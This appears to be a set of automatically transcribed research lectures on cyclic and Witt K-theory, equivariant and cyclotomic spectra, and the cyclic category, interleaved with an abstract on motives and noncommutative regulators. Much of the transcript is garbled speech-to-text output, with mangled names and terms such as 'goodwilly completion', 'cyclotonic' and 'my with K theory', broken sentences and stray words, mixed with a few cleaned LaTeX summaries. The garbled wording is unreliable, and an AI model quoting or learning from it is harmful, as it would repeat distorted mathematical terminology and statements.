McCarthy, which says that if you take this, so this is a function of two variables, you treat it as a function of respect to variable M, this additive variable. So you can do what is known as goodwilly completion. Completion is in the sense of goodwilly calculus. Well, for people who have more algebraic like me, this just means something like proper polynomial completion with respect to M. So some factors are additive. If functions are not additive, you can write down the correction to this called cross effect. This is a function of two variables that can again be additive for not in each variable and so on. So there is a whole theory of polynomial functions developed originally by both of them, I believe. And you can sort of try to compute the best approximation polynomial expression to the function. And if you do it for cyclic theory, you get something which appears also in the theory of the cyclotonic phase. It's a spectrum called TR of A coefficient in M. And already this behaves nicely. So already for TR, again, if you just plug in the finite field, so TR, okay. Again, I can consider any M, but if I consider, if I write just TR of A, this means diagonal by moment. So this again behaves as my withK theory. So this is zero unless I zero if K is finite, say, perfect. Positive characteristic. So this already can compute. And of course, if you look in the there is a question, Dimitri, the good, there is a question, the good willy completion is just the limit of a good willy tower. Yes, yes, yes. I mean, personally, I always think about troponinomal completion because it's easier visual language break. Right. And by the way, the biological Hohschild homology appears as the first term of the towers, actually just the additive if you want the de-tivization of this cycle. It's basically the linear part, linear respect to M. Another thing which you can do, you can look at these guys, if you're all trying to fill, you can try to look at them as algebraic varieties. I mean, the cyclic nerve is simply shall set, but you can put some kind of algebraic structure on that. And look at it as some kind of simple, shall I find scheme and use that structure, this would also give you some completion, which is more or less the same. This has not been written down, I believe, but because I mean, we can do it more easily by good willy completion, but it can be done, gives you the same answer. And then also there is something which should be Ethereum, but I think there is no direct reference in the literature. So I put quotes here, is that my with K theory is actually also the same. So this is a problem of completion also gives me why with K theory, but up to a shift. So let me use logical. So let me think about not new deal groups, but say spaces, spectrum, this will be so I need to shift by one. So there is this loop thing, all this WK. This is not an literature, unfortunately, we discussed it with Thomas Nicholas at some point. So I mean, you can cook up a proof if you just assemble known, known results. But it's probably better to do it in some kind of conceptual way, which as yet is not done. So there's no radio difference, but this is never less. So kind of the take away is that the fundamental thing is the cyclic nerve, which is, which generates all the other environments. Cyclic nerve itself is hard to compute. But then you apply also various sorts of approximation to it. And this gives you computable invariance, which can be then compared. Okay, so this is what I wanted to say about cyclic theory. 
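To summarize the chain of invariants just described in symbols: these are the statements as asserted in the talk, and the last comparison is explicitly said not to be written up anywhere, so treat the display as a summary of claims rather than as citable theorems (the shorthand K^{cyc} for the cyclic K-theory space is mine, not the speaker's).

K^{\mathrm{cyc}}(A; M) := \big|\, CN(\mathcal{P}(A); \mathcal{P}(M)) \,\big| \;\rightsquigarrow\; TR(A; M) = \text{its Goodwillie (polynomial) completion in the variable } M,

THH(A; M) = \text{the first, linear layer of that tower}, \qquad \mathbb{W}K(A; M) \simeq TR(A; M) \ \text{up to a single shift/looping}.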
And now let me discuss cyclotomic structures. So I need to discuss first the equivariant aspects and so on. Let me start with a finite group, and first with the unstable picture. As I mentioned last time, when you think about G-equivariant spaces, there are two types of homotopy category you can consider. One is the naive, or maybe crude, homotopy category of G-spaces. Objects are spaces with an action of G, and we just look at maps which are equivariant maps and which happen to be equivalences, homotopy equivalences without regard to G, and we invert those. In modern language: if I denote by pt/G the group point, the quotient of the point by G, so one object whose automorphism group is G, then this is the homotopy category of functors from this guy to spaces. That's the naive thing. But then we can do a more refined thing. You can again consider G-equivariant spaces, and you consider maps between them and classes of those maps up to G-equivariant homotopy. And it's important to realize that this gives you a different, actually much larger, category, which can also be defined like this: genuine G-spaces. This would again be a homotopy category, but now what you do is consider the category of G-orbits, O(G). A G-orbit is a finite G-set where G acts transitively, so it's a quotient by some subgroup, and morphisms are maps between those which are G-equivariant. So it's a category with, you know, some objects; since G is finite, there is a finite number of objects, which correspond to subgroups. Well, isomorphism classes correspond to conjugacy classes of subgroups. But still, it's a category with nontrivial maps; it's an interesting thing. There is, of course, a forgetful functor, because if you look at just the orbit where G acts on itself, the quotient by the trivial subgroup, then its automorphism group is just G itself, and this gives you an embedding from pt/G into the orbit category. So there is a restriction functor: if you have a genuine G-space, you can forget the rest of the structure and consider just the naive thing. But there is something else. This category on the left is big. Alternatively, if you don't like orbits (an orbit is something where G acts transitively), you can actually drop that condition and consider the category of all finite G-sets: sets where G acts in some way, not necessarily transitively; maps are G-equivariant maps. And then say that a functor from Gamma G to spaces is additive if it sends disjoint unions to products. So there is always a map. Why contravariant? Sorry, here it is also supposed to be contravariant, because what you associate to an orbit, if you have a space with a G-action, is just the space of fixed points with respect to the corresponding subgroup, so it's contravariant. Then for every functor there is a map like this, and I want this to be a homotopy equivalence. That is my notion of additive. And then this genuine category of G-spaces, functors from orbits to topological spaces, can also be interpreted as follows: I consider functors from Gamma G to topological spaces, with pointwise equivalences, but I consider only those guys which are additive; it's the full subcategory spanned by the additive ones. Okay, this was the space-level, unstable story. Now, the slogan is that for spectra, you do just one thing: you add transfer maps.
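Before transfers are added, here is the unstable dictionary just described, in symbols. This is a sketch, and "additive" is the Segal-type condition of the talk.

\mathrm{Ho}^{\mathrm{naive}}(G\text{-}\mathrm{Spaces}) \simeq \mathrm{Ho}\,\mathrm{Fun}(\mathrm{pt}/G, \mathrm{Spaces}), \qquad \mathrm{Ho}^{\mathrm{genuine}}(G\text{-}\mathrm{Spaces}) \simeq \mathrm{Ho}\,\mathrm{Fun}(O(G)^{\mathrm{op}}, \mathrm{Spaces}), \qquad X(G/H) \simeq X^{H},

\text{additivity:}\quad X(S \sqcup T) \xrightarrow{\ \sim\ } X(S) \times X(T) \quad \text{for } X : \Gamma_G^{\mathrm{op}} \to \mathrm{Spaces},

and the genuine homotopy category sits inside functors on \Gamma_G as the full subcategory of additive ones.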
And the way to do it, I mean, one way to do it, but the one which I think is the best, is by modifying the category gamma g. So, you consider a category which I will denote q gamma g has the same objects. So, q gamma g, same objects. Sorry, just a second. Objects are again just finite, as you said. But morphisms are now correspondences, 0s1. And morphisms are correspondences like this. Now, you could just take the isomorphism classes of those, but this would not be the good thing to do because it's too crude that destroys symmetry. So, you really should think of this q gamma g not as a category, but as a two category. So, here are objects, morphisms are like this, and two morphisms are isomorphism between these guys. So, for every two sets, the category of morphisms is actually the group of diagrams like this. So, this is what you do. And then, if you want now to define j-curve-variant spectra, then this is just a category. You notice like this. This is just a category of this q gamma g. So, I need to consider stable things. So, this is functions from q gamma g to spectra not spaces. And they have to be edited. In fact, if you do it like this, you don't even need to consider, you can also put spaces here. Consider functions to spaces. And this would automatically give you a spectrum because of some version of a single machine. So, all the spectra which are connective in an appropriate sense actually correspond to spaces. So, there is a fully f-cunded. None of this is in literature unfortunately, as far as I know, although it has been around for, I don't know, 15 years, everybody knows this, but there are no ready references. And that's part of the problem why we can't really prove some comparison theorems, which we would like to publish that. And part of the reason for that is technical, because first of all, this is a two category. So, this has to be really done some kind of a kind of a categorical setup to make it work. And that's, I mean, that requires some writing, right? So, people are kind of too lazy to do it. But nevertheless, it's all true. So, this is how things are. And in particular, there is a version of the single machine for the g spaces, which was introduced by Shamakawa long time ago, which boxes Shannon Matzin used. But that unfortunately is not strong enough. So, it doesn't give you enough control, it doesn't give you what I write here. So, one actually needs to strengthen that. And that's something which is still a bit nevertheless. Dimitri, there's a question by Shan Tilson. So, he says he asks, so, where aren't stable splitings equivalently? Stable what? Splitings. Where? Not sure. Yeah. Shan, can you be more precise? In the inclusion from g spaces to g spectra? I don't know. This is a fully faithful embedding. And I mean, downstairs, it's not g spaces anymore, because I added q, right? It's a function from, I mean, spaces would be if I just put gamma here. And this is q. So, if you want, so, there is a function from g spaces to g spectra, which is the suspension spectrum, of course. But this corresponds to some kind of induction from gamma g to q gamma g. But if you have a function from q gamma g, but to spaces, then this is already fully faithful. So, you don't need to. In fact, if you don't have g, you just take q gamma. And this very close, I mean, this contains this category of pointed finite sets. And that is exactly what goes into the single machine. Okay. Yeah. All right. So, so this how it goes. Okay. 
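In symbols, the stable construction just sketched; the speaker stresses that this is folklore without a convenient reference, so the display is a transcription of what is being described, not a citation:

Q\Gamma_G: \quad \mathrm{Ob} = \text{finite } G\text{-sets}, \qquad \mathrm{Maps}(S_0, S_1) = \big\{\, S_0 \longleftarrow T \longrightarrow S_1 \,\big\} \ \ (\text{a groupoid; composition by pullback}),

G\text{-}\mathrm{Spectra} \;=\; \mathrm{Fun}^{\mathrm{add}}(Q\Gamma_G, \mathrm{Spectra}), \qquad \text{additive meaning } X(S \sqcup T) \xrightarrow{\ \sim\ } X(S) \times X(T).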
So, how do you see all those fixed point functions in this language? So, for g spectra, there are two types of fixed points. So, there is the geometric fixed points, and there is something which didn't have a name, and then they called it categorical fixed points. And now they probably call it genuine fixed points. So, it changes. So, one of them is very easy. One is just a valuation. So, so those genuine fixed points. How does it go? So, let me denote this by psi. So, for any subgroup h, you have a fixed point function psi h. And in terms of this function from q gamma, this is just a valuation at the genuine page. And for geometric fixed points, so what you do is first define something called inflation. So, inflation comes with the term inflation comes from the theory of makey and by the way, the makey factors is the same theory except target of your functions are not spectra but complexes. And then get the notion of derived makey functions. So, for makey function, I actually wrote the paper about this. It was not related to q. But anyway, so inflation. So, if you have some subgroup, instead of g, you can consider a normalizer. Kind of h. So, it's normalizer. And then you consider the quotient. It's somewhat similar to a wild group in the group theory. And then you observe that for any h. So, for any h, we have a function which does the following. So, we take a small five h. So, we take q gamma and this goes to q gamma g and this goes to q gamma w of h. So, you take a set and you just send it to the fixed points. So, if you look at the set of fixed points, then the normalizer acts on this set. But h actually acts trivial. So, the action actually factors through an action of w of h. So, as h is naturally w of h set. So, that's this. And then you prove a lemma. So, you have the factor and then you can consider pullback. After commutes with these joint unions, so it's an additive guys to additive guys and then so you get pullback from well, w of h spectra to j spectra. This is called inflation. And then lemma is that this actually fully faithful. This is something you have to check. I can't really comment on this. This is not that difficult once you realize it's true, but it's kind of surprising. If you have to prove it is not obvious, they won't do it. And once you do that, so once you do that, you can consider it's adjoint. So, it has an adjoint. So, left adjoint. Left adjoint. Why? Let's say hat from g spectra to w of h spectra. And then the geometric fixed point function is exactly this compulsive just forgetful. This evaluation of w of h just goes to spectra. So, geometry fixed points of some x are obtained by applying this guy. And then evaluating at the trivial. I mean not trivial, but the biggest orbit. All right, so this is how we see all those guys. And the general picture just follows. So, this category of just spectra is actually a triangulated category, well stable if you want. It has some kind of semi orthogonal decomposition. Maybe I should write this because this is important to keep in mind. In fact, it's already in the original paper of May Lewis and other people where it was invented, but the longest error was different. So, it's not stated cleanly in these terms. So, it took me some time to extract it from there. So, let me share this knowledge with you. So, in general what happens is that this guy has a semi orthogonal decomposition. It has a filtration. The composition is glued out of pieces. Pieces are numbered by conjugacy classes of subgroups. 
Or, if you want, isomorphism classes of objects in O(G). And the pieces are just very naive things: these are spectra with an action of W(H). Let me denote it like this, the homotopy category of functors from this guy to spectra, where the subscript means stable. So this is the most naive version of the equivariant stable category you can consider, just spectra with an action of a group. And the genuine thing is glued out of those guys. And the gluing functors, the gluing data, are some sort of generalized Tate cohomology, Tate cohomology with respect to families. So that's the basic picture. The category is huge, but it has those sectors corresponding to subgroups, which are easy, and then there's some gluing, but the gluing is not that bad. I mean, for example, if you restrict attention to things which have finite homological dimension in some sense, then all those Tate cohomology terms will disappear and you are just left with the pieces. Okay, so this is the general setup for equivariant stable homotopy. Now, this was finite groups. And traditionally, the level of generality in the topological sources, I mean the people who invented it, would be, more generally, compact Lie groups. And one can do the version for compact Lie groups; of course, now those categories have to be topologized, so that the hom sets would actually be some kind of homotopy types as well. But the point is that we don't need it. This is maybe strange, because you would think that the circle would come into play, right? But in fact, if you look closely, nowhere in this cyclotomic business do you have a genuinely equivariant spectrum with respect to the circle. Because, as I said, the genuine equivariant category has those sectors corresponding to subgroups. For the circle, the subgroups are the cyclic subgroups and then the circle itself, but the latter never enters the picture. People only consider the part which corresponds to cyclic subgroups. So, effectively, it's only genuinely equivariant with respect to all those cyclic subgroups of the circle. That's all you need; you don't need the circle. Conversely, as I will argue in a moment, what you do need is to arrange the same cyclic subgroups in the other direction: instead of taking the embeddings from one to the other, you should take the projections, not the direct limit, which is the group of roots of unity, but conversely the projective limit, which is the profinite completion of Z. So, instead, what we need to use is actually a version for finitely generated profinite groups. For example, Z-hat. And then the upshot is that it works exactly the same as before, with one modification. So, where am I? Now, if G is profinite, then you can adopt the same approach, but you slightly change the notion of finite sets. Instead of finite G-sets, we now consider admissible G-sets, and this is two conditions. First of all, for any point, the stabilizer of the point is of finite index, open. So the set is a union of finite orbits, but maybe an infinite union. However, for any fixed finite-index subgroup, the fixed-point set is finite. So it's a union of finite orbits, but each finite orbit can appear only a finite number of times; they can grow, but then the size of the orbits has to grow. And this is the only modification. So this gives you some kind of category, Gamma for G-hat, and the rest of the story is actually the same: it gives you some kind of notion of G-equivariant spectra, now for a profinite group. Okay.
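For a profinite G, the admissibility condition just stated reads, in symbols (for the finitely generated profinite groups in play, "open" and "closed of finite index" are interchangeable):

S \ \text{admissible} \iff \mathrm{Stab}_G(s) \subseteq G \ \text{is open for every } s \in S, \quad\text{and}\quad S^{H} \ \text{is finite for every open subgroup } H \subseteq G,

so S is a possibly infinite disjoint union of finite orbits, with each orbit type occurring only finitely often.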
Now, what has it got to do with the fixed point? And now I can answer the question, which I was asked actually at the very end of the last talk. So, I said that it deserves a good answer. And this is the answer. So, the question is what my definition of the category lump, which I defined categorically, maps were some functors, but I only allowed for which had some degree, but they only allowed functors of degree one. Questions, what if I allow functors of degree, which is not one. And the answer is that this actually fits very nicely with this perspective point. So, definition. So, Dimitri, there are questions about finite index. So, by Remy Pondob and De Bruyne, he asks, when you say finite index, do you mean open? You are very continuity condition on objection. Yes, I mean, I'm working with profiling groups with the profiling topology, find, finitely generated and then open and the confines of the same. Finitely generated, profiling group, I mean profiling complete. All right. So, it's profiling topology, so it's open. I mean, the example I actually need is on the Z hat, but I think the theory works for all finite index. Okay, so definition. Cyclotomic category. Lambda R. So, objects are still the same as lambda, so these are just n. But now maps are the same as the other. Now the condition is that the degree is not zero. So, there are some functions which just end everything to an object and all the maps to the identity, which are not interesting, sort of degenery. There are one things which are not degenery in this sense, but then I allow all degree. Now, an example of something, so if degree is one, then this is power lambda. So, let's say that the map is horizontal. Horizontal. So, what's an example of a map of degree which is not one? The basic one is like, we take some nL. And this has, so this is a circle, so this has an automorphism of other L. And we just take the quotient, right? You can take the quotient and the level of the quiver, in fact, even the pocket, but it will be the quotient. So, there's a quotient map. And I want, I say that the concrete is vertical if this isomorphic to this kind of quotient. There is also a categorical notion of discrete cofibration. If you know what that is, then this is the quiver. And then this horizontal and vertical maps form what is known as a factorization system of lambda r, in the sense of Balsfeld, which means some things, in particular, it means that every map in the cyclotomic category factors uniquely. So, every map factors unique, klepto-unique isomorphism as, you know, there is first of all some kind of horizontal map and then some kind of vertical map. Horizontal, this is vertical. And conversely, if you have a diagram like this, if you have a vertical map and a horizontal map, then in this category you can form actually a Cartesian square. So, there is a full back square where this h prime will be horizontal and this will be vertical. Okay, now if you look at this lambda r and you only consider horizontal maps, and this I will denote by the index of lambda r or only the horizontal map and this is of course just lambda. But if you look at the vertical map, then this is the category of orbits for the group z. Oh, which is the same thing, I mean orbits are finite by definition, so this is the same as orbits for its profiling completion. And so lambda r combines both lambda and orbits for this group. 
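In symbols, the structure on the cyclotomic category \Lambda_R just described; "horizontal" and "vertical" are the speaker's terms, and the display only records the properties that were stated:

\mathrm{Maps}(\Lambda_R) = \{\, f : \deg f \neq 0 \,\}, \qquad \text{horizontal} = \{\deg = 1\}, \ \ \Lambda_R^{\mathrm{h}} \cong \Lambda, \qquad \text{vertical} = \text{quotients } [nl] \longrightarrow [n] \ \text{by } \mathbb{Z}/l, \ \ \Lambda_R^{\mathrm{v}} \simeq \{\text{finite orbits of } \hat{\mathbb{Z}}\},

and every map factors, uniquely up to unique isomorphism, as a horizontal map followed by a vertical one, with vertical maps admitting pullbacks along horizontal ones.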
And so in order to define the cyclotomic things, and this would be kind of the clean definition of the cyclotomic spectra, which is I think the most conceptual clean one, you just take this lambda r and you repeat the procedure you did for the orbits. So, first of all, you need to add these joint unions. Somebody should mute the testing. Okay. Now add. And somebody mute somebody, I mean, okay, thanks. Now add these joint unions. And in fact, finite but also infinite but sort of admissible in the sense which I had before. So I had formal unions, you know. Let me take this. Okay, sorry. Thanks. Yeah, you know how to do this, right? You go to participant list and then mute somebody. Oh, yeah. You can do it. Yeah. So, you can see the things like that. Admissible means that for every n i there is only finite number of n terms here. So, this gives me some category which I need some notation for, so let me call it what. I don't know. What's in my nose? Lambda r gamma. Oops. Lambda r gamma. And then you do this Q thing. Well, for orbits you can do just correspondences and when I said correspondences, I didn't tell you how the compositions are defined. Compositions are of course defined by just taking pullbacks. And that's why it's not a good idea to restrict yourself to orbits because if you take two orbits and take the product, it will be a G set, but it can now split into several orbits. So, you get the joint union sort of by necessity if you want to have compositions. And so in this case, this way had to add this joint unions here too and then what you now define. Now consider so Q lambda r gamma, right? So objects are in lambda r gamma. And so maps are correspondences of the following types. So there's some kind of generalized L. I mean this n is actually a disjoint unit of some kind, right? There is some m dot. And then there is a diagram like this. So the only difference is that here I can allow on the right I can allow any maps, whereas on the left I only allow vertical maps. Normally I need to do this because my pullbacks only exists for vertical maps. And in this category lambda r gamma, once I add up the disjoint union, vertical maps admit all pullbacks with respect to both horizontal and vertical maps. So this will define category, well two categories maybe. Now the definition. Definition. Cyclotonic. I put quotes here because it's not the definition of the literature and the fact that the same is not. There is no published. It's what I want to be a definition. That's true. And additive. Okay. And why I think that this is a good definition, because you get everything basically for free now. So first of all, this is obviously a cyclotonic spectrum. And this definition. I mean, I explained why this is a cyclic object. Just by considering, you know, we have a quiver you consider a tensor algebra, replace the center of the path algebra the quiver. And instead of K theory for that. And this is obviously factorial. And exactly the same thing goes for cyclotonic structure. And if you have a vertical map then there's a certain function which has an adjoint and both induce my from K theory. And there is also a notion of a typical. Everything, which starts with actually lambda are. Well, I only allow maps such that the degree of the map is the power of five prime prime p. And then I can repeat the procedure I can see the consider at the joint unions consider the take the portion, K, Q, K, so on. So there is this category of cyclotomic spectrum. 
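In symbols, the definition just proposed; the speaker stresses that it is not the definition found in the literature, and the name \Lambda_R\Gamma for the category obtained by adding admissible disjoint unions is only my shorthand for what is on the board:

\mathrm{CycSp} \;:=\; \mathrm{Fun}^{\mathrm{add}}\big(Q\Lambda_R\Gamma,\ \mathrm{Spectra}\big), \qquad \mathrm{CycSp}_p \;:=\; \mathrm{Fun}^{\mathrm{add}}\big(Q\Lambda_{R,p}\Gamma,\ \mathrm{Spectra}\big),

where \Lambda_{R,p} \subset \Lambda_R keeps only the maps whose degree is a power of the fixed prime p, and the correspondences in Q(-) are required to have a vertical left leg, as above.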
And there is a category of p-typical cyclotomic spectra. But then what's funny is that you can construct some kind of inflation, and it becomes actually an equivalence once you invert, no, not invert, once you localize. So let me write this in words: an equivalence up to localization. So I had to split this Witt K-theory into pieces by hand to obtain the p-typical one, but once you do the cyclotomic story, this becomes kind of automatic. And then, as I said, this filtration can also be described in terms of sectors, in terms of a semiorthogonal decomposition and gluing data. In fact, in this case there will be only one sector, and this will be just the circle, so this would be spectra with an action of the circle. And, as I said, this generalized Tate cohomology which enters the picture often vanishes. In this case, in fact, if you work p-locally, the relevant cohomology vanishes in all cases except for the cyclic group of order p. So p squared, p cubed and so on, all these guys don't contribute; the only thing you get is actually order p. And this gives you the Nikolaus-Scholze description. This works like magic just because, you know, we're lucky: this semiorthogonal decomposition is almost orthogonal, there is only one possible gluing, and there are no conditions on the gluing either, so this is kind of a free situation. So this suggests a very easy and direct description of cyclotomic spectra, and that is exactly what Nikolaus and Scholze did. For computations this is of course what you want to use, and this is what people use nowadays, with huge success. But for conceptual reasons I think the correct definition is the one that I gave. And so these are some motivations, and the main motivation for looking at this picture, for me, is that it also works with coefficients. Kind of the whole gist of my lectures was probably that, if you can, you should generalize your things to the noncommutative setting and allow coefficients, because then at some point you can reduce to the linear situation, so it's crucial to work with coefficients. So, what about coefficients? WK of (A, M) is not a cyclotomic spectrum anymore, we lose the cyclic symmetry, but it's still a genuine equivariant spectrum. In particular it has those fixed points. And then there's this THH, and it actually appears just as geometric fixed points with respect to the whole group. And, as a reminder, the guy itself should be more or less the same as TR. Okay. My time is up, but let me take a minute; I'm practically done. To recapitulate: this WK of (A, M), as I said, should be the same as TR. Historically, TR was defined in terms of THH, but actually the relationship is symmetric; in fact, TR is maybe more fundamental, and THH can be recovered from it as fixed points. Historically it went the other way around: TR was obtained as an inverse limit of categorical fixed points of THH. But the difference is that what I have here you can do with coefficients, and that's much easier to prove, because you reduce to A equal to K. Without coefficients, of course, well, without coefficients, THH has some kind of residual structure: a non-complete S1-equivariant spectrum structure, meaning that it's a spectrum with S1-action, genuinely equivariant with respect to all the finite cyclic subgroups. And then it has this; let me maybe just write the notation like this.
So in this sense, the two things define each other. And I think the picture with the hat is kind of more relevant, I mean, it's closer to the point. I think this is it. I think this is all I wanted to tell you; thank you for your attention to these three lectures, it was a pleasure. So thanks. Thanks a lot for the talk. So are there questions? Maybe I have a first question. You said that on WK(A, M) with coefficients there's no cyclotomic structure. Can you explain why? Yes, because you break the cyclic symmetry when you choose M. Okay, but is there a choice of M where you can see it? If you take the diagonal bimodule, yeah. And the point is that even if you break the cyclic symmetry, so you break the S1-action, you still get the Z-hat structure, which I think is important to use. Okay, thanks. So any other questions? Okay, so I think there are no more questions. So thanks again for your nice and rich series of talks, and okay, we meet in half an hour. Thanks.
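To record, in symbols, the relations asserted in the closing minutes of the talk; these are the speaker's claims, and the comparison of WK with TR is said not to be in the literature, so read the display as a summary rather than as citable statements:

\mathbb{W}K(A; M) \ \text{is a genuine } \hat{\mathbb{Z}}\text{-equivariant spectrum}, \qquad THH(A; M) \;\simeq\; \Phi^{\hat{\mathbb{Z}}}\, \mathbb{W}K(A; M), \qquad \mathbb{W}K(A; M) \;\simeq\; TR(A; M),

while without coefficients THH(A) retains a non-complete S^1-structure, genuine for all finite cyclic subgroups, from which TR(A) is recovered as an inverse limit of categorical fixed points.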
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of étale type, and theories of crystalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from algebraic K-theory, and there is a bunch of "motivic" conjectures claiming that in various contexts, this map can be refined to some "regulator map" that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern point of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of Bökstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition, the non-commutative setting allows for completely new methods. One such is the observation that Hochschild homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this has already allowed one to prove several general comparison results.
|
10.5446/50944 (DOI)
|
Let me start with a brief reminder of what I mean I won't remind everything with that one thing and so the setup is as follows have some key most case it will be perfect to fill the first characteristic but some key something that can be just a bit to the dream we have some a so last time it was community but in fact it doesn't even have to be that they associate if you need to let K algebra of course if we're over a field that's automatically flat now I define this environment actually didn't introduce a name for this let me do it now so I consider algebraic key theory of our series one form of variable t of coefficients in a completed so this section the inverse limit of k theories of truncating guys and then I notice that it splits as k theory of a plus something else which is of interest for me so let me call this something else with it's not standard name but I mean I need something like this double K of a and then there was a observation this is what really cutting the first lecture so if case p local this guy carries those on domorphisms silent and which are almost I don't put on if you if case p local and n is a divisible and n is prime to p then you can invert n and then you get an honest I don't put on another whole things plate product of copies was smaller guy called so this is kind of big with k theory and this is typical with k theory this is just the kernel of all of all those and this what is our interest in it is what I want to start so I said that in situation one case perfect field and a is community smooth this gives you the wrong with forms and particularly it has a differential so where the differential differential comes from a circle action this was the end of last so how does this go let me explain this now so I mean there are various ways to do it the one I prefer actually walls little bit of category theory but I think this is in the end the most essential player one so this is what I'm going to present partially it already appeared in talk by Tina on Monday in the form of a circle cycle object but let me be slightly more precise about a reminder because most people heard about it but still so just a simple thing take some n and let me denote by n brackets and long the nose there's it's a category but it's a very small category so I take a wheel we were with n vertices this is a wheel we were and this is the path category of this we were so there are objects and morphisms are just you know that of course I mean this there is orientation and the only way the only invariant for path is actually its length we just go around the quiver for as long as you want so basically alternative you can think that objects are just residues what n and then maps from a to a prime are just integers such that a plus l so l is this length is this zero and l is a map from a to a prime such that a plus l is a prime model of n of course for every guy we have an endomorphism which which is a path which goes around the loop around the wheel exactly once so there is the still a a a response to f so it's a path that goes around the loop now that I mean it's a it's a category but of course category means something huge and this one is very small but still the same kind of little objects morphin so okay now if you have two guys like this and you have some func m you observe the following you take some a object you have this don't a then you so functions and so a map to a map right so this will be some endomorphism some endomorphism of a so it has to be some power of and that guy should 
generates the story generates the endomorphism mono so this guy raised to some power which is a non-negative integer I do know by degree of f and in these observations that this degree does not depend on a just the same for all guys does not depend on it can be zero for example if we just send everything to a single object and all the maps to the identity then this will be zero and I wanted to be actually non-zero and for now I wanted to be exactly one so definition as a small category denoted by lambda the category so objects are just you know numbers by non-negative integers you know the traditional like this and brackets so there's some discrepancy in literature where they start numbering from zero or from one and there are valid reasons for both unfortunately so I'm going to start with one so this is just the number of vertices and then objects and then maps morphisms are just you know functions and prime of a degree one this is a very very well known gadget was invented by L.M. Kohn like almost 40 years ago and has different definitions but for me this one is now if you look at the category you can look at it's nerve as a special set you can take its classifying space and then this classifying space which I denote like this is actually so it's not it's simply connected but not contractible it's a CP infinity or equivalent to the classifying space of the circle where circle is the group considered as a group the usual group structure or you want to be you want same thing right and this means the following so if you have so if you have some function from lambda to some category which is locally constant in the sense that it inverts all maps so every map in lambda goes to something in the target category and then since the thing is simply connected locally constant means constant however they can do something slightly more refined you can now take as our target the category of spaces and whatever sense you want so it can be there are everything which models homotopy types it could be a logical spaces or completion sets matter then if you know I'll denote by whole of lambda the homotopy category functions like this so you take functions and you invert point-wise we could go answers you need some technology for that but that's standard and then if x is locally constant in the sense that this means that any map goes to something which not directly nice omorphism but the weak equivalence equivalence is a weak equivalence for all f so you have a full subcategory here spent by these guys I do know this by LC and locally constant then this local constant then is equivalent to the category of spaces with s1 action also it's logical spaces for to be precise and then so you take s1 space equipped the continuous s1 action and you take so Tina mentioned this and so this is a precise one of the ways you can make the precise statement that cyclic objects correspond to things within the circle action here is a fine point which I want to mention explicitly so this thing here can actually mean two different things and in my experience to topologists it usually means one thing and two people from all algebraic at the presentation things means the other so you consider spaces with s1 action you consider the homotopy category but the question is what kind of homotopies do we allow do you insist that homotopies are also a covariant or do you or do you just invert all maps which are how much the equivalence without regards to s1 so the latter is actually much much smaller category in the form because if you 
also allow a homotopies which are s1 covariant only those homotopies then for example the space of fixed points with respect to some subgroup becomes a homotopy invariant notion so this kind of refined homotopy category contains a lot of information whereas the latter thing is actually very very stupid well I mean that's it's much smaller category for example the classifying space of a point would be something contractual s1 action would be just homotopy equivalent to the point in the letter category but not in the form so this here the small one so small one so invert and then so this is one action but if your target is not just a space but something linear like a spectrum for example or you can also consider a homological version where your target is a complex of chain complex or submarine then so if x goes from one to the spectrum then you can actually split this s1 action to parts so this one has homology in degree zero and in degree one so you can split this and then you get a natural map from b from value of x let's say object one it doesn't matter which object I take here because the thing is locally constant so they all the same there is a map on this guy to its loop homologically this would be a shift in degree and this is known as con signal maybe right differential and this how the differential in the wrong with complex and also say the wrong differential in the usual the wrong complex in the context of the course the back appears with the typical source the differential some this okay so what I want to do I want to consider my with k theory and endow it with a structure of a locally constant cycle code now how do I do this again I mean there are various ways to do it but I'm going to use a category favorite so one advantage of defining this category lambda in the way I did is the following so if I take any small category Dmitry we have a question if you are taking the joint of the s1 action some disjoint base points it depends on what you mean by space but you probably want deep pointed spaces but then I want disjoint base point which is as one fixed and another question the question was about the differential on the previous slides aha should I show it yeah would be helpful yes so it was an action on a spectrum and then the smash product then is the adjoin to the free loop space isn't it yes the point is that if it's a spectrum so you have the summation map you can split the free loop space to the product of x and the base loop space so free loop space splits into x times omega x so have a map from x to Lx just this action and then I take the component which lands in the moment and that's my definition okay thanks all right so now it takes a small category and then I can define its cyclic nerve this will be a cyclic set from lambda to sets just in a very naive very direct way it sends some n you know just to the set of functions from and lambda to this completely parallel to the usual definition of a nerve or a small category except instead of kind of the category of delta which parameterizes ordinals I consider this lambda which parameterizes kind of it's now a loop category or a quiver which is a wheel and not just a string essentially the same construction obviously functorial respect with maps and lambda just from the way I can track the plan there and so it's a cyclic set I won't actually convert it to a category so there is something which is called growth and deconstruction you don't really need to know if you don't already you don't really need to know the full extent 
of it but what I want to do I want to consider the following category again so constant consider something we should you know I would you know lambda I some category which comes with the function and its object appears on object in lambda and some functor yeah so this projection here is forgetful which just forgets the second day forgets there's a functor and the fiber so if you have an object here then the fiber of this functor over some n it's just this discrete thing just the set of those I can do it for any functor to sets right if you do it for simple show set this is usually called the category of simplices and it's in quotes the same day tomorrow less so you can recover again your functor from sets from given a category like this a projection which satisfies some conditions now but the reason I want to do it this way is the following assume now that what you have is not a category but what they call it to catch so now take to catch I see I don't really need to know the precise definition you need to know it's something which has objects then for any two objects you have not a set of maps from C to C but set of more but category of and then there are compositions there are identity domorphisms and you can sometimes ask it to be strict so the composition is strictly associated also there are some kind of constraints there and there is actually a way to package the whole thing rather in a more convenient way using this growth and deconstruction I mean it's many places in the literature for example I just recently had an opportunity to write a preserver of this it's posted on archive pretty standard the precise details are not that important you can I mean somewhat technical but you can make it work but now what I want to do I want to consider the cyclic nerve for this two categories and sorry and I want to do it right away in a way in the second way using this growth and construction so then we have and this will now be again just a category it moves to the projection to plan so objects are pairs again and gum is a bunker from N to C so this has to be made sense of but again this is under things so objects go to objects morphisms in N go to morphisms in C but then whether it's a 